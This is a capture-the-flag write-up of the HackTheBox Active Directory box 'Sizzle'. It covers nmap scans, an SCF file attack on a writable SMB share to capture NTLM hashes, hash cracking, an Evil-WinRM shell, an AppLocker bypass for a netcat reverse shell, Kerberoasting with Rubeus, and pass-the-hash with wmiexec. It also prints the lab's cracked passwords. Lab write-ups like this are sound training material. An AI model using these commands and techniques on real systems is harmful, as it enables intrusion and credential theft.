This is my writeup for HackTheBox’s box called Sizzle which is a really good and challanging box that requires you to exploit an Active Directory server. This box starts with exploiting Samba with the help of SCF File Attack which when combined with Evil-WinRM gives us our first foothold. Following which we Kerberoast the server to get user.txt followed by getting the NTLM hash for Administrator and logging in via wmiexec.py.
Reconnaissance
I use a tool called nmapAutomator and it is something I can recommend, alternatively you can also use AutoRecon
# Nmap 7.80 scan initiated Mon Sep 7 19:36:12 2020 as: nmap -Pn -sCV -p21,53,80,135,139,389,443,445,464,593,636,3268,3269 -oN nmap/Basic_10.10.10.103.nmap 10.10.10.103 Nmap scan report for sizzle (10.10.10.103) Host is up (0.078s latency).
PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: |_ SYST: Windows_NT 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Site doesn't have a title (text/html). 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=sizzle.htb.local | Not valid before: 2018-07-03T17:58:55 |_Not valid after: 2020-07-02T17:58:55 |_ssl-date: 2020-09-07T14:09:18+00:00; 0s from scanner time. 443/tcp open ssl/http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Site doesn't have a title (text/html). | ssl-cert: Subject: commonName=sizzle.htb.local | Not valid before: 2018-07-03T17:58:55 |_Not valid after: 2020-07-02T17:58:55 |_ssl-date: 2020-09-07T14:09:18+00:00; 0s from scanner time. | tls-alpn: | h2 |_ http/1.1 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=sizzle.htb.local | Not valid before: 2018-07-03T17:58:55 |_Not valid after: 2020-07-02T17:58:55 |_ssl-date: 2020-09-07T14:09:18+00:00; 0s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=sizzle.htb.local | Not valid before: 2018-07-03T17:58:55 |_Not valid after: 2020-07-02T17:58:55 |_ssl-date: 2020-09-07T14:09:18+00:00; 0s from scanner time. 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=sizzle.htb.local | Not valid before: 2018-07-03T17:58:55 |_Not valid after: 2020-07-02T17:58:55 |_ssl-date: 2020-09-07T14:09:18+00:00; 0s from scanner time. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=9/7%Time=5F563E61%P=x86_64-pc-linux-gnu%r(DNSVe SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x SF:04bind\0\0\x10\0\x03"); Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
# Nmap 7.80 scan initiated Mon Sep 7 20:05:25 2020 as: nmap -Pn -sCV -p5985,5986,9389,47001,49664,49665,49668,49669,49677,49686,49687,49690,49693,49705,49722,49741 -oN nmap/Full_10.10.10.103.nmap 10.10.10.103 Nmap scan report for sizzle (10.10.10.103) Host is up (0.086s latency).
PORT STATE SERVICE VERSION 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found | ssl-cert: Subject: commonName=sizzle.HTB.LOCAL | Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL | Not valid before: 2018-07-02T20:26:23 |_Not valid after: 2019-07-02T20:26:23 |_ssl-date: 2020-09-07T14:36:39+00:00; 0s from scanner time. | tls-alpn: | h2 |_ http/1.1 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49677/tcp open msrpc Microsoft Windows RPC 49686/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49687/tcp open msrpc Microsoft Windows RPC 49690/tcp open msrpc Microsoft Windows RPC 49693/tcp open unknown 49705/tcp open msrpc Microsoft Windows RPC 49722/tcp open msrpc Microsoft Windows RPC 49741/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Sep 7 20:06:39 2020 -- 1 IP address (1 host up) scanned in 73.91 seconds
PORT STATE SERVICE VERSION 53/udp open domain (generic dns response: SERVFAIL) | fingerprint-strings: | NBTStat: |_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 123/udp open ntp NTP v3 61685/udp open domain (generic dns response: SERVFAIL) | fingerprint-strings: | NBTStat: |_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 61961/udp open domain (generic dns response: SERVFAIL) | fingerprint-strings: | NBTStat: |_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 62699/udp open domain (generic dns response: SERVFAIL) | fingerprint-strings: | NBTStat: |_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 62958/udp open domain (generic dns response: SERVFAIL) | fingerprint-strings: | NBTStat: |_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 5 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port53-UDP:V=7.80%I=7%D=9/7%Time=5F564421%P=x86_64-pc-linux-gnu%r(NBTSt SF:at,32,"\x80\xf0\x80\x82\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAAAAA SF:AAAAAA\0\0!\0\x01"); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port61685-UDP:V=7.80%I=7%D=9/7%Time=5F564421%P=x86_64-pc-linux-gnu%r(NB SF:TStat,32,"\x80\xf0\x80\x82\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAA SF:AAAAAAAAA\0\0!\0\x01"); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port61961-UDP:V=7.80%I=7%D=9/7%Time=5F564421%P=x86_64-pc-linux-gnu%r(NB SF:TStat,32,"\x80\xf0\x80\x82\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAA SF:AAAAAAAAA\0\0!\0\x01"); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port62699-UDP:V=7.80%I=7%D=9/7%Time=5F564421%P=x86_64-pc-linux-gnu%r(NB SF:TStat,32,"\x80\xf0\x80\x82\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAA SF:AAAAAAAAA\0\0!\0\x01"); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port62958-UDP:V=7.80%I=7%D=9/7%Time=5F564421%P=x86_64-pc-linux-gnu%r(NB SF:TStat,32,"\x80\xf0\x80\x82\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAA SF:AAAAAAAAA\0\0!\0\x01");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Sep 7 20:01:02 2020 -- 1 IP address (1 host up) scanned in 27.42 seconds
This box had many services running and looking at the type of services running my first hunch was that this is an Active Directory server but missing 88 port was odd to me. After getting some idea about the machine I started enumerating the box.
Enumeration
HTTP / HTTPS Enumeration
When I visited the https://sizzle.htb.local domain I was greeted with a GIF. I ran gobuster on these protocols in the background and carried on with my enumeration. I downloaded the GIF and used exiftool on the media to check for metadata.
Gobuster
Gobuster returned the result. gobuster-old -t 40 -u http://10.10.10.103 -x aspx,php -e -w $WORDLIST_COMMON -s 200,204,301,302,307,401
Visiting http://10.10.10.103/certsrv asked for credentials. So I moved to the next service, SMB in hopes of getting some credentials to login.
SMB
I then tried to access the SMB share anonymously and the server replied.
Directories like CertEnroll, Department Shares, Operations looked interesting some are related to the directories we saw in our HTTP enumeration. To enumerate this further I mounted it to /mnt directory using the command sudo mount -t cifs "//10.10.10.103/Department Shares" /mnt. Upon which enumerating became a tad bit easier.
I downloaded all the files from the ZZ_ARCHIVE. Comparing hashes of all the files made it clear all files were empty.
Further file enumeration lead us to Users directory which had many potential usernames. We will write it to a file called usernames just incase if we have to bruteforce login.
I then started looking at File Permissions of the directories and figured you can write to Public. Since we can now upload files to shares we can exploit this situation with SCF File Attack. Here we upload a Shell Command File with our path in IconFile to make the box request us for the resource upon which we can capture the NTLM hash.
Listening for NTLM hashes
1
responder -I tun0
We can now crack Amanda’s hash with hashcat -m 5600 hash.amanda /home/alpha/wordlist/rockyou.txt -O
LDAP
Using the obtained credentials I used them to see if LDAP could give us some more details about the machine. I used this to enumerate LDAP.
DSA info (from DSE): Supported LDAP versions: 3, 2 Naming contexts: DC=HTB,DC=LOCAL CN=Configuration,DC=HTB,DC=LOCAL CN=Schema,CN=Configuration,DC=HTB,DC=LOCAL DC=DomainDnsZones,DC=HTB,DC=LOCAL DC=ForestDnsZones,DC=HTB,DC=LOCAL Supported controls: 1.2.840.113556.1.4.1338 - Verify name - Control - MICROSOFT 1.2.840.113556.1.4.1339 - Domain scope - Control - MICROSOFT 1.2.840.113556.1.4.1340 - Search options - Control - MICROSOFT 1.2.840.113556.1.4.1341 - RODC DCPROMO - Control - MICROSOFT 1.2.840.113556.1.4.1413 - Permissive modify - Control - MICROSOFT 1.2.840.113556.1.4.1504 - Attribute scoped query - Control - MICROSOFT 1.2.840.113556.1.4.1852 - User quota - Control - MICROSOFT 1.2.840.113556.1.4.1907 - Server shutdown notify - Control - MICROSOFT 1.2.840.113556.1.4.1948 - Range retrieval no error - Control - MICROSOFT 1.2.840.113556.1.4.1974 - Server force update - Control - MICROSOFT 1.2.840.113556.1.4.2026 - Input DN - Control - MICROSOFT 1.2.840.113556.1.4.2064 - Show recycled - Control - MICROSOFT 1.2.840.113556.1.4.2065 - Show deactivated link - Control - MICROSOFT 1.2.840.113556.1.4.2066 - Policy hints [DEPRECATED] - Control - MICROSOFT 1.2.840.113556.1.4.2090 - DirSync EX - Control - MICROSOFT 1.2.840.113556.1.4.2204 - Tree deleted EX - Control - MICROSOFT 1.2.840.113556.1.4.2205 - Updates stats - Control - MICROSOFT 1.2.840.113556.1.4.2206 - Search hints - Control - MICROSOFT 1.2.840.113556.1.4.2211 - Expected entry count - Control - MICROSOFT 1.2.840.113556.1.4.2239 - Policy hints - Control - MICROSOFT 1.2.840.113556.1.4.2255 - Set owner - Control - MICROSOFT 1.2.840.113556.1.4.2256 - Bypass quota - Control - MICROSOFT 1.2.840.113556.1.4.2309 1.2.840.113556.1.4.319 - LDAP Simple Paged Results - Control - RFC2696 1.2.840.113556.1.4.417 - LDAP server show deleted objects - Control - MICROSOFT 1.2.840.113556.1.4.473 - Sort Request - Control - RFC2891 1.2.840.113556.1.4.474 - Sort Response - Control - RFC2891 1.2.840.113556.1.4.521 - Cross-domain move - Control - MICROSOFT 1.2.840.113556.1.4.528 - Server search notification - Control - MICROSOFT 1.2.840.113556.1.4.529 - Extended DN - Control - MICROSOFT 1.2.840.113556.1.4.619 - Lazy commit - Control - MICROSOFT 1.2.840.113556.1.4.801 - Security descriptor flags - Control - MICROSOFT 1.2.840.113556.1.4.802 - Range option - Control - MICROSOFT 1.2.840.113556.1.4.805 - Tree delete - Control - MICROSOFT 1.2.840.113556.1.4.841 - Directory synchronization - Control - MICROSOFT 1.2.840.113556.1.4.970 - Get stats - Control - MICROSOFT 2.16.840.1.113730.3.4.10 - Virtual List View Response - Control - IETF 2.16.840.1.113730.3.4.9 - Virtual List View Request - Control - IETF Supported extensions: 1.2.840.113556.1.4.1781 - Fast concurrent bind - Extension - MICROSOFT 1.2.840.113556.1.4.2212 - Batch request - Extension - MICROSOFT 1.3.6.1.4.1.1466.101.119.1 - Dynamic Refresh - Extension - RFC2589 1.3.6.1.4.1.1466.20037 - StartTLS - Extension - RFC4511-RFC4513 1.3.6.1.4.1.4203.1.11.3 - Who am I - Extension - RFC4532 Supported features: 1.2.840.113556.1.4.1670 - Active directory V51 - Feature - MICROSOFT 1.2.840.113556.1.4.1791 - Active directory LDAP Integration - Feature - MICROSOFT 1.2.840.113556.1.4.1935 - Active directory V60 - Feature - MICROSOFT 1.2.840.113556.1.4.2080 - Active directory V61 R2 - Feature - MICROSOFT 1.2.840.113556.1.4.2237 - Active directory W8 - Feature - MICROSOFT 1.2.840.113556.1.4.800 - Active directory - Feature - MICROSOFT Supported SASL mechanisms: GSSAPI, GSS-SPNEGO, EXTERNAL, DIGEST-MD5 Schema entry: CN=Aggregate,CN=Schema,CN=Configuration,DC=HTB,DC=LOCAL Other: currentTime: 20200907163653.0Z dsServiceName: CN=NTDS Settings,CN=SIZZLE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=HTB,DC=LOCAL defaultNamingContext: DC=HTB,DC=LOCAL schemaNamingContext: CN=Schema,CN=Configuration,DC=HTB,DC=LOCAL configurationNamingContext: CN=Configuration,DC=HTB,DC=LOCAL rootDomainNamingContext: DC=HTB,DC=LOCAL supportedLDAPPolicies: MaxPoolThreads MaxPercentDirSyncRequests MaxDatagramRecv MaxReceiveBuffer InitRecvTimeout MaxConnections MaxConnIdleTime MaxPageSize MaxBatchReturnMessages MaxQueryDuration MaxDirSyncDuration MaxTempTableSize MaxResultSetSize MinResultSets MaxResultSetsPerConn MaxNotificationPerConn MaxValRange MaxValRangeTransitive ThreadMemoryLimit SystemMemoryLimitPercent highestCommittedUSN: 118875 dnsHostName: sizzle.HTB.LOCAL ldapServiceName: HTB.LOCAL:[email protected] serverName: CN=SIZZLE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=HTB,DC=LOCAL isSynchronized: TRUE isGlobalCatalogReady: TRUE domainFunctionality: 7 forestFunctionality: 7 domainControllerFunctionality: 7
Once I had credentials I also used them to again to enumerate the service using ldapsearch -x -h sizzle.htb.local -D '[email protected]' -w 'Ashare1972' -b 'dc=htb,dc=local' and this which gave us users and their associated certificates. Moving on.
Exploitation
Generating Certificate
After cracking the password of Amanda I tried to login to the certificate authority with the freshly obtained credentials but the machine took an eternity to load the page. Anyhow after if loaded I saw the below page : -
Given this I generated keys for Amanda using openssl genrsa -aes256 -out amanda.key 2048 followed by a certificate signing request openssl req -new -key amanda.key -out amanda.csr. This article might prove useful. After this goto the HTTP Server and click Request a certificate > Advance Certificate Request > Submit the Certificate Signing Request content to the field of Saved Request and click Submit.
Evil-WinRM
Now with the help of EvilWinRM we can get a shell. We have modified the exploit a little bit to suit us.
conn.shell(:powershell) do |shell| until command == "exit\n" do output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')") print(output.output.chomp) command = gets output = shell.run(command) do |stdout, stderr| STDOUT.print stdout STDERR.print stderr end end puts "Exiting with code #{output.exitcode}" end
This lands us a shell. We then transfer nc.exe with Invoke Web-Request to remote machine. This machine was very hardened and it was difficult to transfer files b/w this remote box and my box. Anyhow, once I transfered nc.exe due to group policy I was unable to get a reverse shell to the machine because of Group Policy. Upon some research I came across this repository called UltimateAppLockerByPassList particularly this page was interesting. Once I copied nc.exe to C:\Windows\Temp it gave me back a powershell’s reverse shell.
Privilege Escalation
Escalating to mrlky
Upon enumerating network I found port 88 which wasn’t visible in our nmap scans. To kerberoast I chose to use Rubeus because then I won’t have to port forward. I switched to my Windows 10 VM and compiled Rubeus via Visual Studio you can find a compiled version of the binary here.
Then, transferred the binary to the machine at location C:\Windows\Temp\. Upon issuing .\rub.exe kerberoast /creduser:htb.local\amanda /credpassword:Ashare1972 -> priv esc to another user it gave the NTLM hash for a user called mrlky.
Cracking this Hash with the help of hashcat gives us the password Football#7
Escalating to Administrator
With the help of recently obtained credentials of mrlky we can try to dump NTLM hashes of all users using secretsdump.py
Since we have NTLM hash of the Adminstrator we can use it to gain command access to the machine using wmicexec.py. wmiexec.py -hashes xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx [email protected]. I used this shell to get myself another powershell reverse shell.
Proof
Proof
1
echo"whoami"; whoami; echo"ifconfig"; ipconfig; echo"hostname"; hostname; echo"root.txt"; more C:\Users\Administrator\Desktop\root.txt; echo"user.txt" ; more C:\Users\mrlky\Desktop\user.txt